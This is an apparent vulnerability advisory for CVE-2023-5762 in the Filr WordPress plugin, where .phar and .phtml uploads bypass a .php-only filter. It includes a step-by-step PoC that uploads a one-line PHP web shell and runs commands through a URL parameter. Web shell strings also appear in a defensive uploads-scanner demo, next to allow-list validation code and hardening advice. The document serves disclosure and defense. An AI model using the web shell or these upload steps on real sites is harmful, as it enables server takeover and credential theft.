During the testing of the plugin, an RCE (Remote Code Execution) vulnerability was identified which allows an authenticated user with Author-level privileges to execute operating system commands and fully compromise the server. This vulnerability is considered highly critical and poses a significant threat. It stems from the fact that the action=upload_file mechanism rejects files with a .php extension but fails to reject files with .phar or .phtml extensions, both of which common Apache/PHP configurations also pass to the PHP interpreter. This oversight opens the door for an attacker to upload and execute malicious files with .phar or .phtml extensions.

Main info:

CVE: CVE-2023-5762
Plugin: Filr – Secure document library
Critical: Super High
All Time (downloads): 14 999
Active installations: 800+
Publicly Published: November 28, 2023
Last Updated: November 28, 2023
Researcher: Dmitrii Ignatyev
OWASP TOP-10: A1: Injection
PoC: Yes
Exploit: Will be later
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-5762
https://wpscan.com/vulnerability/6ad99725-eccc-4b61-bce2-668b62619deb/
Plugin Security Certification by CleanTalk

Timeline

November 8, 2023 – Plugin testing and vulnerability detection in the Filr – Secure document library plugin have been completed
November 8, 2023 – I contacted the author of the plugin and provided a vulnerability PoC with a description and recommendations for fixing
November 20, 2023 – The author fixed the vulnerability and released the plugin update
November 22, 2023 – Registered CVE-2023-5762

Discovery of the Vulnerability

In the course of examining the Filr – Secure Document Library plugin, a critical Remote Code Execution (RCE) vulnerability was found. This flaw allows an attacker with Author-level privileges to execute arbitrary commands on the server, potentially leading to a full compromise of the system. The vulnerability was identified in the plugin's file upload mechanism, specifically in the handler for the action=upload_file request.

Understanding RCE attacks

Remote Code Execution (RCE) is a severe security vulnerability that permits an attacker to execute commands on a target system from a remote location. In WordPress, an RCE vulnerability can have devastating consequences, as it allows an attacker to execute arbitrary code in the context of the web server user, compromising the integrity and security of the entire site and often the underlying host.

In the case of the Filr plugin, the vulnerability is linked to the upload_file action. The mechanism is a deny-list that only rejects files with a .php extension and lets files with .phar or .phtml extensions through. Whether such a file is then executed depends on the web server's PHP handler configuration, but the stock Apache/PHP configuration on common distributions maps .phar and .phtml to the PHP interpreter alongside .php (Debian's php module config, for example, uses the pattern ".+\.ph(ar|p|tml)$"). This oversight therefore creates an avenue for an attacker to upload and subsequently execute malicious files with .phar or .phtml extensions.

Exploiting the RCE Vulnerability

Exploiting this RCE vulnerability involves using the plugin's file upload functionality to upload a malicious file with a .phar or .phtml extension. Because uploads are stored under wp-content/uploads/filr/, a directory that is served directly by the web server, the attacker can then request the uploaded file by URL and have the server execute the PHP code it contains.

POC:

1) Go to the plugin's main dashboard: http://your_site/wordpress/wp-admin/edit.php?post_type=filr

2) Click Add New File

3) Upload a file with the extension "phar" and malicious code inside, for example <?php system($_GET['cmd']); ?>

4) Go to http://your_site/wordpress/wp-content/uploads/filr/{number_of_post}/cmd.phar?cmd=ps+aux (or pwd or id) and the command output is returned, confirming RCE
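The root cause described above (a deny-list that only knows about .php) and the PoC (a .phar or .phtml upload that slips through) are illustrated in the following added example. It is not the plugin's code and is not taken from the advisory: the plugin's actual check is not shown on the page, so weak_upload_check is a model of the behaviour described, and the allow-list of document types in hardened_upload_check is an assumption about what a document library would need.

```python
"""Deny-list versus allow-list extension checks for a WordPress document upload.

weak_upload_check models the vulnerable behaviour described for the Filr
upload_file action (only ".php" is rejected). hardened_upload_check is the
allow-list replacement. Neither is the plugin's own code.
"""
import os

# Extensions that common Apache/PHP setups hand to the PHP interpreter.
# Debian's php module config, for example, matches ".+\.ph(ar|p|tml)$";
# the older variants are included for servers with broader AddHandler rules.
PHP_EXECUTABLE_EXTENSIONS = {
    "php", "phar", "phtml", "pht", "phps",
    "php3", "php4", "php5", "php7", "php8",
}

# Assumed document types for a "secure document library"; adjust per deployment.
ALLOWED_DOCUMENT_EXTENSIONS = {
    "pdf", "doc", "docx", "xls", "xlsx", "ppt", "pptx",
    "odt", "ods", "txt", "csv", "zip",
}


def weak_upload_check(filename: str) -> bool:
    """Model of the vulnerable check: accept anything that is not *.php."""
    return not filename.lower().endswith(".php")


def hardened_upload_check(filename: str) -> bool:
    """Allow-list check: accept only known document types.

    Every dotted segment after the base name is inspected, so names such as
    "shell.phar.pdf" are rejected even on servers whose mod_mime handler
    matches any extension in the name rather than only the last one.
    """
    base = os.path.basename(filename)
    # Reject empty names, dotfiles (.htaccess) and names without an extension.
    if not base or base.startswith(".") or "." not in base:
        return False
    segments = base.lower().split(".")[1:]
    if any(seg in PHP_EXECUTABLE_EXTENSIONS for seg in segments):
        return False
    return segments[-1] in ALLOWED_DOCUMENT_EXTENSIONS


def compare_checks(filenames):
    """Return {filename: (weak_accepts, hardened_accepts)} for a batch of names."""
    return {
        name: (weak_upload_check(name), hardened_upload_check(name))
        for name in filenames
    }


# Constructed sample of upload names, including the .phar and .phtml cases from the PoC.
SAMPLE_UPLOADS = [
    "report.pdf",     # legitimate document
    "cmd.php",        # rejected by both checks
    "cmd.phar",       # passes the weak check: this is the CVE
    "cmd.phtml",      # passes the weak check: this is the CVE
    "cmd.PHAR",       # case variant, still executed by a case-insensitive handler
    "cmd.phar.pdf",   # double extension
    ".htaccess",      # would let an attacker re-enable PHP execution in uploads
]

if __name__ == "__main__":
    for name, (weak, hard) in compare_checks(SAMPLE_UPLOADS).items():
        weak_s = "accept" if weak else "reject"
        hard_s = "accept" if hard else "reject"
        print(f"{name:14} weak={weak_s:6} hardened={hard_s}")
```

Running the block prints one line per sample name; the two CVE cases and the case and double-extension variants are accepted by the weak check and rejected by the allow-list.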

___

The potential risks associated with this RCE vulnerability are substantial. An attacker with Author-level privileges could exploit this flaw to execute arbitrary commands, potentially compromising the entire server. Real-world scenarios include the upload and execution of a PHP archive (.phar) or PHP template (.phtml) file containing a web shell, allowing the attacker to run commands as the web server user, read wp-config.php and the database credentials in it, and persist in the server environment.

Recommendations for Improved Security

To enhance the security of the Filr plugin and mitigate the risk associated with this RCE vulnerability, the following measures are recommended:

  • Patch and Update: Ensure that the plugin is updated to the fixed version released on November 20, 2023 or later.
  • Input Validation: Validate uploads on the server side with an allow-list of permitted document types rather than a deny-list of known-bad extensions. In WordPress, wp_check_filetype_and_ext() together with the upload_mimes filter provides this for both the extension and the file's actual content type.
  • File Type Restrictions: Treat every extension the web server maps to PHP (.php, .phar, .phtml, .phps and similar) as executable, and additionally disable script execution inside wp-content/uploads at the web server level, for example with an Apache FilesMatch block that denies requests for those extensions, so that a bypass of the plugin check cannot lead to code execution.
  • Regular Security Audits: Conduct regular security audits and vulnerability assessments to identify and remediate potential security issues promptly, including a sweep of the uploads directory for files that should never be there.
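For administrators who ran a vulnerable version, the audit recommendation above translates into a concrete check: look in the uploads tree for files with PHP-executable extensions, for files whose content starts with a PHP open tag regardless of extension, and for stray .htaccess files. The following is an added example for that sweep, not code from the advisory or the plugin. The sample tree it builds (under a temporary directory, mirroring the wp-content/uploads/filr/{post_id}/ layout named in the PoC) is constructed for the demonstration.

```python
"""Post-incident sweep of a WordPress uploads tree for PHP-executable files.

Walks an uploads directory and reports files that carry a PHP-executable
extension, files whose content begins with a PHP open tag (a web shell hidden
under a harmless extension), and .htaccess files, which can re-enable PHP
execution in the uploads directory. Findings are returned for review; nothing
is deleted.
"""
import os
import shutil
import tempfile

PHP_EXECUTABLE_EXTENSIONS = {
    "php", "phar", "phtml", "pht", "phps",
    "php3", "php4", "php5", "php7", "php8",
}
PHP_OPEN_TAGS = (b"<?php", b"<?=")


def has_php_extension(filename: str) -> bool:
    """True if any dotted segment of the name is a PHP-executable extension."""
    segments = filename.lower().split(".")[1:]
    return any(seg in PHP_EXECUTABLE_EXTENSIONS for seg in segments)


def has_php_open_tag(path: str, probe_bytes: int = 4096) -> bool:
    """True if a PHP open tag appears in the first probe_bytes of the file."""
    with open(path, "rb") as fh:
        head = fh.read(probe_bytes)
    return any(tag in head for tag in PHP_OPEN_TAGS)


def sweep_uploads(root: str):
    """Return a sorted list of (relative_path, [reasons]) for suspicious files."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            reasons = []
            if has_php_extension(name):
                reasons.append("php-executable extension")
            if has_php_open_tag(path):
                reasons.append("php open tag in content")
            if name == ".htaccess":
                reasons.append(".htaccess inside uploads")
            if reasons:
                rel = os.path.relpath(path, root).replace(os.sep, "/")
                findings.append((rel, reasons))
    return sorted(findings)


def build_demo_tree() -> str:
    """Constructed uploads tree for the demonstration; returns its root path."""
    root = tempfile.mkdtemp(prefix="wp_uploads_")
    samples = {
        "filr/12/brochure.pdf": b"%PDF-1.4 constructed sample",
        "filr/12/cmd.phar": b"<?php system($_GET['cmd']); ?>",      # the PoC upload
        "filr/13/notes.txt": b"<?php echo shell_exec($_GET['c']); ?>",  # shell under a harmless extension
        "2023/11/photo.jpg": b"\xff\xd8\xff\xe0 constructed jpeg header",
    }
    for rel, content in samples.items():
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "wb") as fh:
            fh.write(content)
    return root


if __name__ == "__main__":
    demo_root = build_demo_tree()
    try:
        for rel, reasons in sweep_uploads(demo_root):
            print(f"{rel}: {', '.join(reasons)}")
    finally:
        shutil.rmtree(demo_root)
```

On a real site, call sweep_uploads() on the wp-content/uploads path instead of the demo tree. A hit on a file whose extension is harmless but whose content carries a PHP open tag is worth attention even if the server would not execute it today, since a later .htaccess change or a local file inclusion elsewhere could.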

By adopting these security measures, WordPress administrators can significantly reduce the risk of exploitation of this vulnerability and enhance the overall security posture of their WordPress environment.

#WordPressSecurity #RCE #WebsiteSafety #StayProtected #SuperVulnerability


DMITRII I.
CVE-2023-5762 – Filr – Secure document library – RCE via file upload with phar ext – POC
